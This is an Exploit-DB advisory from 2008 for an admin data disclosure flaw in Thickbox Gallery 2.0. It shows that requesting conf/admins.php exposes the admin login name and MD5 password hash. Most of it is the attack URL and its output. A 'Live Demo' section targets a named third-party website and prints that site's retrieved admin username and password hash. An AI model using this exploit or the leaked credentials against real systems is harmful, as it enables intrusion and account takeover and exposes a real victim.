Thickbox Gallery 2.0 - admins.php Admin Data Disclosure Vulnerability

2008-08-26T00:00:00
ID EDB-ID:6314
Type exploitdb
Reporter SirGod
Modified 2008-08-26T00:00:00

Description

Thickbox Gallery v2 (admins.php) Admin Data Disclosure Vulnerability. CVE-2008-3859. Webapps exploit for php platform

                                        
                                            #########################################################################################
[+] Thickbox Gallery v2 Admin Data Disclosure
[+] Discovered By SirGod                         
[+] www.mortal-team.org                         
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz
##########################################################################################

[+] Arbitrary Admin Data Disclosure

    - Go here and you will see the admin data ( login name + crypted password as MD5 )

       http://localhost/[Path]/conf/admins.php

    - Admin data :

          a:1:{s:5:"admin";s:32:"d73ed8a01f624fcb878296bc7ff302bc";}

    - Now extract the admin username and the hash :

        Username : admin

        Password : d73ed8a01f624fcb878296bc7ff302bc

[+] Live Demo

         http://www.davilin.com/tbg/conf/admins.php

    - Retrived :

          a:1:{s:8:"ytakenak";s:32:"56bd1d32bcb1fbd2609e4d7634febbd1";}

    - Name + Password

        Username : ytakenak
      
        Password : 56bd1d32bcb1fbd2609e4d7634febbd1
   

##########################################################################################

# milw0rm.com [2008-08-26]